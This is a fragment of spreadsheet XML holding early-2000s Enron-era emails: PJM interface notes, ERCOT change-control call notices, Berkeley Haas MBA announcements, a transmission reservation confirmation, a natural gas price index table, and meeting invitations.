following is the correct full list:_x000D_
_x000D_
New York - _x000D_
 going into PJM (selling to) - NYPP-E_x000D_
 going out of PJM (buying from) - NYPP-W_x000D_
_x000D_
First Energy - PJM-CEI interface_x000D_
_x000D_
APS (Allegheny) - PJM-APS interface_x000D_
_x000D_
Internal - _x000D_
 DPL - PJM-Wescosvi_x000D_
 others - PJM-Western Hub   (except offset to Day Ahead)_x000D_
_x000D_
VEPCO - PJM-Virginia Power_x000D_
_x000D_
Sorry about all the emails, thanks again - _x000D_
Michael_x000D_
x35098_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 11:35:51 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dodle@ercot.com'})</t>
  </si>
  <si>
    <t>Questions and Change Controls for Friday call, 2/8/02</t>
  </si>
  <si>
    <t xml:space="preserve">All,_x000D_
Attached are the questions and Change Controls for Fridays call._x000D_
_x000D_
NUMBER: 800.430.8190 # 5591_x000D_
TIME: Friday, 2/8/02    10:00 AM_x000D_
_x000D_
 &lt;&lt;ChangeControl2002-257.doc&gt;&gt;  &lt;&lt;ChangeControl2002-255.doc&gt;&gt;_x000D_
&lt;&lt;ChangeControl2002-256.doc&gt;&gt;  &lt;&lt;Change Control 2001-107REFERENCE.doc&gt;&gt;_x000D_
 &lt;&lt;ChangeControl2002-254.doc&gt;&gt;  &lt;&lt;Question1_2-1Table.doc&gt;&gt;_x000D_
&lt;&lt;Question1_2-8.doc&gt;&gt;  &lt;&lt;Questions for Wednesday Call at 10_2-1-02.doc&gt;&gt;_x000D_
 &lt;&lt;ChangeControl2002-258.doc&gt;&gt;  &lt;&lt;ChangeControl2002-259.doc&gt;&gt;_x000D_
&lt;&lt;ChangeControl2002-260.doc&gt;&gt;_x000D_
_x000D_
Dave Odle_x000D_
Retail Transaction Lead_x000D_
ERCOT The Texas Connection_x000D_
(512) 248-3948_x000D_
(512) 567-2329 Mobile_x000D_
dodle@ercot.com_x000D_
_x000D_
_x000D_
_x000D_
 - ChangeControl2002-257.doc _x000D_
 - ChangeControl2002-255.doc _x000D_
 - ChangeControl2002-256.doc _x000D_
 - Change Control 2001-107REFERENCE.doc _x000D_
 - ChangeControl2002-254.doc _x000D_
 - Question1_2-1Table.doc _x000D_
 - Question1_2-8.doc _x000D_
 - Questions for Wednesday Call at 10_2-1-02.doc _x000D_
 - ChangeControl2002-258.doc _x000D_
 - ChangeControl2002-259.doc _x000D_
 - ChangeControl2002-260.doc </t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 06:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Summer 2001 EMBA Seminar In International Business - Initial_x000D_
 Announcement</t>
  </si>
  <si>
    <t>Dear Evening MBA Students,_x000D_
_x000D_
It is once again time to plan for the EMBA Seminar in International_x000D_
Business. For those of you unfamiliar with this course, please see_x000D_
http://www.haas.berkeley.edu/groups/HaasGlobal/NGcourseoutline.htm for the_x000D_
2000 version that looked at Ghana, Belgium and the Netherlands or_x000D_
http://www.haas.berkeley.edu/groups/HaasGlobal/JVcourseoutline.htm for the_x000D_
1999 version that included Japan and Vietnam._x000D_
_x000D_
For 2001 we are going to try something slightly different. We will have two_x000D_
distinct programs - one will be a repeat of last year's and the other will_x000D_
venture into new territory. The details are as follows. Please note that_x000D_
everything mentioned below is still tentative and subject to change or_x000D_
cancellation._x000D_
_x000D_
PROGRAM DESCRIPTIONS_x000D_
_x000D_
Both programs will commence with a series of classes, at Haas, in June._x000D_
_x000D_
Program A, led by Diane Dimeff will retrace the itinerary of the 2000_x000D_
program to Ghana, the Netherlands and Belgium. The approximate dates for_x000D_
the travel portion will be Saturday, July 7 through Saturday, July 21._x000D_
_x000D_
Program B, led by Sebastian Teunissen will consist of one of two possible_x000D_
itineraries, depending on student demand:_x000D_
_x000D_
itinerary 1: Cuba, Panama and Venezuela (or Costa Rica.)_x000D_
itinerary 2: Australia and Indonesia._x000D_
_x000D_
Travel for program B will also start on approximately July 7 and end on_x000D_
approximately July 21._x000D_
_x000D_
Costs for the programs are expected to be approximately equal to those_x000D_
charged in previous years ($4,600), with the exception of the_x000D_
Australia/Indonesia option. If this program is selected the final cost is_x000D_
likely to be roughly $1,000 higher due to increased air fares. Final costs_x000D_
will be determined once itineraries are set._x000D_
_x000D_
As you can see, planning is still in the early stages. But, before we go_x000D_
much farther we need to know who is interested in participating. So, we_x000D_
need to receive expressions of interest, in the form of a refundable $100_x000D_
deposit from interested students._x000D_
_x000D_
APPLICATION PRIORITIES_x000D_
_x000D_
Students will have different priorities depending on seniority. Priorities_x000D_
are as follows:_x000D_
_x000D_
Top Priority - both programs - students in fourth semester or higher in_x000D_
January 2001 who HAVE NOT participated in the program in a previous year._x000D_
_x000D_
Second Priority - Program B only - students in fourth semester or higher_x000D_
who did participate in the program in a previous year. These students are_x000D_
not eligible for program A._x000D_
_x000D_
Lowest Priority - both programs - students in second or third semester._x000D_
_x000D_
Each group is limited to a maximum of 15 students._x000D_
_x000D_
APPLICATION PROCEDURE_x000D_
_x000D_
Please submit, to the Evening MBA office, a check in the sum of $100_x000D_
payable to UC Regents together with the following information, no later_x000D_
than December 15, 2000._x000D_
- Name_x000D_
- Semester level as of January 2001_x000D_
- Whether or not you have previously participated in the program_x000D_
- Choice of program: A or B (If you choose program B please also indicate_x000D_
your preferred destination: Latin America or Australia/Indonesia.)_x000D_
- e-mail address_x000D_
_x000D_
Once we have a clear indication of preferences the final details will be_x000D_
planned and announced. The announcement will likely be made in January. At_x000D_
that time you will be advised of the program for which you are eligible._x000D_
You will then be asked to increase your deposit by $900 and the entire_x000D_
$1,000 deposit becomes non-refundable._x000D_
_x000D_
OTHER ISSUES_x000D_
_x000D_
Please check your passport to ensure that it expires no earlier than_x000D_
December 31, 2001. If it does please renew it now. Passports with shorter_x000D_
expirations may be rejected for visas, depending on the countries to which_x000D_
you will travel._x000D_
_x000D_
Also, please check the visa requirements for the countries of interest for_x000D_
your particular nationality. This may have a bearing on the program that_x000D_
you select._x000D_
_x000D_
You might wish to check out the US State Department Consular Information_x000D_
Sheets and Travel Warnings at http://travel.state.gov/travel_warnings.html_x000D_
before applying.You may also wish to review health information at_x000D_
http://www.tripprep.com/ or at http://www.cdc.gov/travel/._x000D_
_x000D_
Should you have any questions please contact me._x000D_
_x000D_
Regards,_x000D_
_x000D_
Sebastian_x000D_
===============================_x000D_
Sebastian Teunissen_x000D_
Director of International Affairs_x000D_
Haas School of Business_x000D_
University of California, Berkeley_x000D_
Berkeley, California 94720-1900 USA_x000D_
Tel:   (510) 643-4999_x000D_
Fax:  (510) 642-8228_x000D_
_x000D_
http://www.haas.berkeley.edu/HaasGlobal</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 14:06:53 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Date: Thursday, February 7th , 2002_x000D_
_x000D_
Location: ECS 06980_x000D_
_x000D_
Orientation will be split into two sessions and divided by alpha-order. Sessions will run 10am-12 pm and 2pm- 4 pm._x000D_
_x000D_
We encourage all of you to attend your designated session as valuable information will be presented, and you will have the opportunity to get answers to your questions._x000D_
_x000D_
You can speed things up tommorrow by filing in the attached forms - alternatively you can complete them there_x000D_
_x000D_
10am Session   Letters A- K_x000D_
_x000D_
2pm Session Letters L-Z_x000D_
_x000D_
_x000D_
_x000D_
    _x000D_
PLEASE RSVP (BY REPLYING TO THIS E-MAIL) - IF YOU HAVEN'T DONE SO ALREADY</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 17:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'owner-e204-1@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>frozenset({'e204-2@haas.berkeley.edu', 'e204-1@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>Dear E204-1 and E204-2 students,_x000D_
I have attached the simulation files from lecture on the past_x000D_
Wednesday/Thursday.  There are three Haasville attachments_x000D_
--the blank one has no assumption cells (for you to work with),_x000D_
the 'A" has the simulation for Problem 1, and the 'AB' has the_x000D_
simulation for both technologies (problems 2 and 3)._x000D_
We will start project management  next week followed by_x000D_
inventory management._x000D_
For the discussion session on April 22 (Saturday),_x000D_
Elizabeth Joy will plan to (see below) review simulation techniques_x000D_
with you and any of the class examples (as attached),_x000D_
and offer help on prior work in linear/non-linear programming_x000D_
and Team Assignment problems you may have had.  PLEASE_x000D_
send Elizabeth an e-mail if you plan to attend so she can have an_x000D_
idea of the total number for any photocopying.  IF NO ONE_x000D_
indicates that they are planning to come this weekend_x000D_
(if she doesn't receive an e-mail by Friday, 6 PM, she may_x000D_
not hold the session).  If the session is not held, you can_x000D_
send e-mail questions instead  (joy@haas.berkeley.edu)_x000D_
during this period.  We are assuming that some of you_x000D_
will want to attend a review session, but if not, then I don't_x000D_
want Elizabeth to come here and find an empty classroom._x000D_
_x000D_
--Tom McCullough_x000D_
_x000D_
_x000D_
 - E204_HaasvilleA(Blank)_sim.xls_x000D_
 - E204_HaasvilleA_sim.xls_x000D_
 - E204_HaasvilleAB_sim.xls_x000D_
 - E204_Airline_Overbooking_sim-2.xls_x000D_
_x000D_
=======================================================================_x000D_
Tom McCullough_x000D_
Senior Lecturer_x000D_
Haas School of Business_x000D_
University of California at Berkeley_x000D_
==========================================================================</t>
  </si>
  <si>
    <t>Fri, 29 Mar 2002 09:05:01 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'oasissvcs@apsc.com'})</t>
  </si>
  <si>
    <t>TRANSSTATUS 29743 CONFIRMED</t>
  </si>
  <si>
    <t xml:space="preserve">Reservation status has changed. Details of the reservation are listed below:_x000D_
ASSIGNMENT_REF = 29743_x000D_
SELLER_CODE = AZPS_x000D_
SELLER_DUNS = 958982563_x000D_
CUSTOMER_CODE = EPMI_x000D_
CUSTOMER_DUNS = 848921276_x000D_
AFFILIATE_FLAG = 0_x000D_
PATH_NAME = W/AZPS/AZPS-AZPS/FOURCORNE345 - PNPKAPS230//_x000D_
POINT_OF_RECEIPT = FOURCORNE345_x000D_
POINT_OF_DELIVERY = PNPKAPS230_x000D_
SOURCE = FOURCORNERS_x000D_
SINK = PNPK_x000D_
CAPACITY = 25_x000D_
CAPACITY_REQUESTED = 25_x000D_
SERVICE_INCREMENT = HOURLY_x000D_
TS_CLASS = FIRM_x000D_
TS_TYPE = POINT_TO_POINT_x000D_
TS_PERIOD = OFF_PEAK_x000D_
TS_WINDOW = FIXED_x000D_
TS_SUBCLASS = WHEEL_x000D_
NERC_CURTAILMENT_PRIORITY = Nerc Priority 1_x000D_
OTHER_CURTAILMENT_PRIORITY = Default_x000D_
START_TIME = 04/01/2002_x000D_
STOP_TIME = 04/02/2002_x000D_
CEILING_PRICE = 1.95_x000D_
OFFER_PRICE = 1.95_x000D_
BID_PRICE = 1.95_x000D_
PRICE_UNITS = $/mW_x000D_
PRECONFIRMED = YES_x000D_
ANC_SVC_LINK = N/A_x000D_
ANC_SVC_REQ = N/A_x000D_
POSTING_REF = 0_x000D_
SALE_REF =_x000D_
REQUEST_REF =_x000D_
DEAL_REF =_x000D_
NEGOTIATED_PRICE_FLAG =_x000D_
STATUS = CONFIRMED_x000D_
STATUS_NOTIFICATION = lisa.gang@enron.com_x000D_
STATUS_COMMENTS =_x000D_
TIME_QUEUED = 03/29/2002_x000D_
 _x000D_
TIME_OF_LAST_UPDATE = 03/29/2002_x000D_
PRIMARY_PROVIDER_COMMENTS =_x000D_
SELLER_COMMENTS =_x000D_
CUSTOMER_COMMENTS = call (503)464-5070 if problems_x000D_
SELLER_NAME = AZPS_x000D_
SELLER_PHONE = 602.250.1128_x000D_
SELLER_FAX = 602.250.1155_x000D_
SELLER_EMAIL = oasisadm@apsc.com_x000D_
CUSTOMER_NAME = Enron Power Marketing, Inc._x000D_
CUSTOMER_PHONE = (713)853-3801_x000D_
CUSTOMER_FAX = (713)646-8272_x000D_
CUSTOMER_EMAIL = bill.rust@enron.com_x000D_
REASSIGNED_REF = 0_x000D_
REASSIGNED_CAPACITY = 0_x000D_
 _x000D_
 </t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 02:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>HPL Nom for March 1, 2001</t>
  </si>
  <si>
    <t>(See attached file: HPLN0301.xls)_x000D_
_x000D_
 - HPLN0301.xls</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 09:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.llodra@enron.com'})</t>
  </si>
  <si>
    <t>Re: Dave Samuels</t>
  </si>
  <si>
    <t xml:space="preserve">Louise_x000D_
_x000D_
Thanks for the note about Dave.  I do not know Dave but will probably pay him a visit in Boston to see what we might do with them.   Acitivity out of their northeast office has primarily been on the nat gas side, but with their recent acquistion of Central Hudson's generation assets in NY they have been getting more active in power.  _x000D_
_x000D_
I have been meaning to swing by and introduce myself on one of my trips to Houston, and will be sure to do so on the next trip._x000D_
_x000D_
_x000D_
Regards_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Louise Kitchen@ECT_x000D_
04/27/2001 08:33 AM_x000D_
To:	John Llodra/Corp/Enron@ENRON_x000D_
cc:	 _x000D_
_x000D_
Subject:	Dave Samuels_x000D_
_x000D_
Just in case you meet him - there is a guy who left Enron yesterday to join Dynegy in Boston.  Dave has been with Enron since 1996 (I think), joining as an associate and leaving as a VP.  Dave wanted to relocate back to the North East._x000D_
_x000D_
I've worked with Dave for about 4 years and he a very straightforward guy, I have no idea how much we do with Dynegy but Dave may be a good contact for you._x000D_
_x000D_
Regards_x000D_
_x000D_
Louise_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 08:02:25 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tanya.rohauer@enron.com', 'carol.st.@enron.com', 'elizabeth.sager@enron.com'})</t>
  </si>
  <si>
    <t>Legal Credit Solutions mtg - B. Bradford, E. Sager, C. St. Clair &amp;_x000D_
 T. Rohauer (Mercy x35082/BILL)</t>
  </si>
  <si>
    <t xml:space="preserve">When: Occurs every Tuesday effective 10/23/2001 until 1/31/2002 from 9:00 AM to 9:30 AM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where: EB2829_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 02:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'maggie.li@enron.com'})</t>
  </si>
  <si>
    <t>Re: Ask for a favor</t>
  </si>
  <si>
    <t xml:space="preserve">I would be happy to help.  What do I need to fill out or provide?_x000D_
_x000D_
_x000D_
Maggie Li @ EES   01/03/2001 04:22 PM_x000D_
_x000D_
To: Rob G Gay/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Ask for a favor_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Rob,_x000D_
_x000D_
Happy New Year!_x000D_
_x000D_
How have you been doing? Last time when I talked to Blanca after the latest _x000D_
reorg, she said that it hadn't been announced how Southern Cone was going to _x000D_
be. How's it going now?_x000D_
_x000D_
After nearly 3 years with Enron, I plan to go back to B school. I want to _x000D_
apply for Rice Executive MBA because this will be the most efficient way for _x000D_
me. Besides, I plan to apply two other full-time MBA programs. You have been _x000D_
my supervisor for one year. Although that was my first year with Enron, that _x000D_
assignment was quite important to me. I've learned a lot through that year _x000D_
and later I realize more and more the creativeness and greatness of the Debt _x000D_
Fund. The year with Debt Fund was an important phase of my professional _x000D_
history. May I ask you to be one of my evaluators? As you know, the _x000D_
competition for B school is always hard. A strong recommendation from you, a _x000D_
person in senior management will be crucial for my application. The deadline _x000D_
for Rice is Jan. 15. I'm sorry to give you such a short time. With the other _x000D_
two, I plan to finish them by the end of January or early Feburary. I _x000D_
appreciate it very much if you could spare me some time._x000D_
_x000D_
Thank you in advance for your generous help._x000D_
_x000D_
_x000D_
Regards,_x000D_
_x000D_
Maggie_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 07:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wes.colwell@enron.com', 'george.mcclellan@enron.com', 'brian.redmond@enron.com', 'c.thompson@enron.com', 'tim.belden@enron.com', 'janet.dietrich@enron.com', 'sally.beck@enron.com', 'gary.hickerson@enron.com', 'jere.overdyke@enron.com', 'jeff.donahue@enron.com', 'scott.neal@enron.com', 'beth.perlman@enron.com', 'mark.frevert@enron.com', 'david.oxley@enron.com', 'mark.haedicke@enron.com', 'jean.mrha@enron.com', 'jeffrey.shankman@enron.com', 'raymond.bowen@enron.com', 'phillip.allen@enron.com', 'rodney.malcolm@enron.com', 'mike.mcconnell@enron.com', 'jordan.mintz@enron.com', 'vince.kaminski@enron.com', 'christopher.calger@enron.com', 'max.yzaguirre@enron.com', 'hunter.shively@enron.com', 'john.lavorato@enron.com', 'w.duran@enron.com', 'rob.milnthorp@enron.com', 'joseph.deffner@enron.com', 'john.arnold@enron.com', 'kevin.presto@enron.com', 'scott.josey@enron.com'})</t>
  </si>
  <si>
    <t>ENA Analyst and Associate "Brownbag" Presentations</t>
  </si>
  <si>
    <t>It is the intent of the Office of the Chairman to maintain a high quality _x000D_
flow of Analysts and Associates rotating through Enron North America as well _x000D_
as provide them with up to date information on all the potential rotations in _x000D_
ENA.  Additionally, we would like to provide the ENA AA's a forum for your _x000D_
respective groups to promote your business unit as a viable alternative in _x000D_
the rotation process.  I need your assistance for this endeavor and want your _x000D_
respective business unit to participate in the process by delivering an _x000D_
informal presentation to the AA group which should include the following:_x000D_
_x000D_
Your business unit's current activities, purpose and interfaces with other _x000D_
departments_x000D_
Recent successes and current projects_x000D_
Ideas on the horizon_x000D_
Opportunities in your business unit for AA's _x000D_
The benifits of rotation in your business unit_x000D_
An open Q&amp;A session_x000D_
_x000D_
These presentations should be informal and it is not necessary to have _x000D_
handouts.  The goal is to provide an open forum for the AA's and to have them _x000D_
ask questions about each business unit.  Also, bringing one of your current _x000D_
AA's with you to provide their insight might help stimulate discussion.  Ted _x000D_
Bland will be contacting you to schedule your business unit for a _x000D_
presentation.  The first "brownbag" will take place September 8 between _x000D_
12:00pm and 1:00pm in Room 30 C1._x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Thu, 3 May 2001 10:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'miguel.garcia@enron.com', 'mauricio.trejo@enron.com', 'rogers.herndon@enron.com', 'diana.allen@enron.com', 'chad.starnes@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 'dean.laurent@enron.com', 'anna.santucci@enron.com', 'joe.quenet@enron.com', 'william.abler@enron.com', 'claudia.guerra@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'joseph.wagner@enron.com', 'robert.benson@enron.com', 'lisa.shoemake@enron.com', 'jeff.king@enron.com', 'justin.laverell@enron.com', 'karla.compean@enron.com', 'edward.baughman@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'chris.dorland@enron.com', 'russell.ballato@enron.com', 'gerald.gilbert@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juan.padron@enron.com', 'ted.ballinger@enron.com', 'kayne.coulter@enron.com', 'doug.miller@enron.com', 'jason.choate@enron.com', 'gary.justice@enron.com', 'larry.campbell@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'tamara.black@enron.com', 'doug.sewell@enron.com', 'laura.podurgiel@enron.com', 'clayton.vernon@enron.com', 'grace.kim@enron.com', 'gautam.gupta@enron.com', 'joe.stepenovitch@enron.com', 'andy.rodriquez@enron.com', 'garrett.tripp@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'lloyd.will@enron.com', 'gretchen.lotz@enron.com', 'larry.valderrama@enron.com', 'narsimha.misra@enron.com', 'matt.lorenz@enron.com', 'dustin.collins@enron.com', 'peter.makkai@enron.com', 'juan.hernandez@enron.com', 'mark.symms@enron.com'})</t>
  </si>
  <si>
    <t>WebSite Link</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
---------------------- Forwarded by Tamara Jae Black/HOU/ECT on 05/03/2001 07:26 AM ---------------------------_x000D_
From:	Mark Symms/ENRON@enronXgate on 05/02/2001 05:17 PM_x000D_
To:	Tamara Jae Black/HOU/ECT@ECT_x000D_
cc:	 _x000D_
Subject:	WebSite Link_x000D_
_x000D_
TJ,_x000D_
	Kevin has asked that we email the website link again to everyone._x000D_
_x000D_
Here it is_x000D_
http://eastpower.dev.corp.enron.com/portal_x000D_
_x000D_
Thanks_x000D_
_x000D_
Mark Symms_x000D_
Sr. Specialist - East Power _x000D_
713-853-3105_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Nov 2000 08:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CNG</t>
  </si>
  <si>
    <t>Let's chat about CNG retail storage on Monday</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 10:00:05 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">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Tuesday, November  20, 2001=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Monday, November  19, 200=_x000D_
1)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20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20_x000D_
_x000D_
Region     Hub=09High=09Low=09Wtd Avg Index=09Change ($)=09Vol (mmBtu)=09Hu=_x000D_
b Name=09_x000D_
 LOUISIANA =09=09=09=09=09=09=09_x000D_
    ANR SE=09          $2.3800=09          $1.8900=09          $2.0225=09+ =_x000D_
   .4136=09         293,000=09American Natural Resources Pipeline Co. - SE =_x000D_
 Transmission Pool=09_x000D_
    Columbia Onshore=09          $2.4700=09          $1.8700=09          $2=_x000D_
.1529=09+    .5234=09         270,300=09Columbia Gulf Transmission Co. - On=_x000D_
shore Pool =09_x000D_
    Henry Hub=09          $2.4600=09          $1.9300=09          $2.0774=_x000D_
=09+    .3593=09       1,472,500=09Henry Hub tailgate - Louisiana =09_x000D_
    NGPL LA=09          $2.3275=09          $1.8600=09          $1.9720=09+=_x000D_
    .3835=09         238,800=09Natural Gas Pipeline Co. of America, Louisia=_x000D_
na Pool =09_x000D_
    Tenn 500L=09          $2.3400=09          $1.8150=09          $2.0306=_x000D_
=09+    .4295=09         422,700=09Tennessee Gas Pipeline Co.-Zone L, 500 L=_x000D_
eg Pool =09_x000D_
    Tenn 800L=09          $2.3300=09          $1.8150=09          $2.0073=_x000D_
=09+    .4024=09         251,300=09Tennessee Gas Pipeline Co.-Zone L, 800 L=_x000D_
eg Pool =09_x000D_
    TETCO ELA=09          $2.5200=09          $1.8550=09          $2.1374=_x000D_
=09+    .4885=09         248,500=09Texas Eastern - East LA =09_x000D_
    TETCO WLA=09          $2.4800=09          $1.8200=09          $1.9198=_x000D_
=09+    .3116=09         244,200=09Texas Eastern - West LA =09_x000D_
    Transco 65=09          $2.5000=09          $1.9650=09          $2.1221=_x000D_
=09+    .3847=09         244,600=09Transco - Station 65 =09_x000D_
    Trunkline ELA=09          $2.4500=09          $1.8200=09          $1.97=_x000D_
95=09+    .4371=09         103,300=09Trunkline Gas Company - East Louisiana=_x000D_
 Pool =09_x000D_
    TxGas SL=09          $2.4700=09          $1.8800=09          $2.0918=09=_x000D_
+    .4279=09         328,900=09Texas Gas Transmission Corp.-Zone SL FT Poo=_x000D_
l =09_x000D_
 MIDCONTINENT =09=09=09=09=09=09=09_x000D_
    MichCon, citygate=09          $2.4300=09          $2.0700=09          $=_x000D_
2.1744=09+    .3588=09         243,500=09Michigan Consolidated =09_x000D_
    NGPL Midcont=09          $2.1000=09          $1.7150=09          $1.793=_x000D_
0=09+    .4001=09         165,400=09Natural Gas Pipeline Co. of America, Mi=_x000D_
d-Continent Pool =09_x000D_
    NGPL Nicor, citygate=09          $2.4200=09          $1.8950=09        =_x000D_
  $2.0090=09+    .3880=09         519,500=09Natural Gas Pipeline Co. of Ame=_x000D_
rica, Nicor Citygate=09_x000D_
    NGPL NIPSCO, citygate=09          $2.4500=09          $1.8950=09       =_x000D_
   $1.9945=09+    .3900=09         121,200=09Natural Gas Pipeline Co. of Am=_x000D_
erica, Nipsco Citygate=09_x000D_
    NNG Demarcation=09          $2.3900=09          $1.8100=09          $2.=_x000D_
0449=09+    .5635=09         217,200=09Northern Natural Gas, Demarcation Po=_x000D_
ol =09_x000D_
 NORTHEAST =09=09=09=09=09=09=09_x000D_
    Columbia TCO=09          $2.5000=09          $1.9800=09          $2.141=_x000D_
7=09+    .3887=09         605,300=09Columbia Gas Co. - TCO Pool =09_x000D_
    Dominion So.Point=09          $3.0000=09          $2.0600=09          $=_x000D_
2.3471=09+    .5403=09         367,500=09Dominion - South Point =09_x000D_
    TETCO M3=09          $3.0900=09          $2.2100=09          $2.5296=09=_x000D_
+    .5388=09         399,000=09Texas Eastern - M3 Zone =09_x000D_
    Transco Z-6 (NY)=09          $3.2375=09          $2.4100=09          $2=_x000D_
.6257=09+    .6410=09         327,600=09Transcontinental Gas Pipe Line Corp=_x000D_
. - Zone 6 (NY)=09_x000D_
 WEST =09=09=09=09=09=09=09_x000D_
    El Paso non-Bondad=09          $1.7800=09          $1.5900=09          =_x000D_
$1.7077=09+    .5433=09          83,200=09El Paso - San Juan Basin, Blanco =_x000D_
Pool=09_x000D_
    Huntingdon/Sumas=09          $1.9300=09          $1.7650=09          $1=_x000D_
.8250=09+    .5531=09         128,000=09Westcoast Energy &amp; Northwest Pipeli=_x000D_
ne Corp.=09_x000D_
    Opal=09          $1.7500=09          $1.4900=09          $1.5583=09+   =_x000D_
 .3706=09         129,800=09Opal=09_x000D_
    PG?Citygate=09          $2.0500=09          $1.8900=09          $1.9756=_x000D_
=09+    .5850=09         287,000=09PG?- Citygate =09_x000D_
    SoCal Border=09          $1.9500=09          $1.8300=09          $1.885=_x000D_
0=09+    .4775=09         226,600=09Southern California Border Points (Ehre=_x000D_
nberg,Topock,Needles)=09_x000D_
 WEST TEXAS =09=09=09=09=09=09=09_x000D_
    El Paso - Keystone=09          $2.0900=09          $1.6300=09          =_x000D_
$1.7492=09+    .4700=09         310,000=09El Paso - Keystone Pool=09_x000D_
    Waha=09          $2.2000=09          $1.7500=09          $1.8735=09+   =_x000D_
 .5027=09         213,8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20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20_x000D_
This data is provided to you free of charge.  IntercontinentalExchange rese=_x000D_
rves the right to cancel this service at any time for any reason or no reas=_x000D_
on at all.                                                                 =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
               =20_x000D_
You agree that IntercontinentalExchange does not make any representations o=_x000D_
r warranties, express or implied, with respect to the data.                =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                         =20_x000D_
To become an Exchange Participant or inquire about the indices, please cont=_x000D_
act sales@intcx.com .                                                      =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                =20_x000D_
To unsubscribe from this service, click here unsubscribe .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Copyright IntercontinentalExchange, Inc. 20=_x000D_
01, All Rights Reserved.                                                   =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                           =_x000D_
                                                                      </t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 08:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'william.abler@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'craig.mataczynski@nrgenergy.com'})</t>
  </si>
  <si>
    <t>FW: NRG LOI</t>
  </si>
  <si>
    <t xml:space="preserve">Craig, as promised, attached is the draft LOI that we discussed yesterday.  _x000D_
We will send some hard copies via overnight mail as well.  I have been _x000D_
talking to Elaine to schedule June 13th, or your soonest available date, for _x000D_
a follow up meeting in Houston.  _x000D_
_x000D_
We have recently implemented several similar services deals with municipals _x000D_
and industrials in other regions of the country.  This experience combined _x000D_
with Enron's strong trading presence in the Northeast will allow us to _x000D_
develop a proposal for NRG's sizeable Northeast generation portfolio that is _x000D_
mutually beneficial._x000D_
_x000D_
We'll look forward to meeting soon and moving things forward.  Thanks._x000D_
_x000D_
- Bill_x000D_
_x000D_
ph. 713-853-9375_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 13:05:47 -0800 (PST)</t>
  </si>
  <si>
    <t>Canceled: Re-scheduled: WHS/Retail Systems Integration Analysis -_x000D_
 Results/Recommendations</t>
  </si>
  <si>
    <t xml:space="preserve">Call in number:  800-991-9019,  passcode: 7945088_x000D_
_x000D_
Background &amp; Meeting Objective:_x000D_
_x000D_
Under the direction of Tim Belden, Kevin Presto, Lloyd Will, Anthony Dayao and Beth Perlman, Todd Busby and I have completed the 3 week analysis of wholesale and retail power systems integration. _x000D_
_x000D_
We would like to present the results of our analysis and discuss recommendations the team believes will lead to cost savings and process efficiencies.  The analysis results are enclosed.   _x000D_
_x000D_
Agenda;_x000D_
_x000D_
Background_x000D_
Summary of Results_x000D_
Integrated Systems Vision_x000D_
Open Issues_x000D_
Recommendations_x000D_
_x000D_
   </t>
  </si>
  <si>
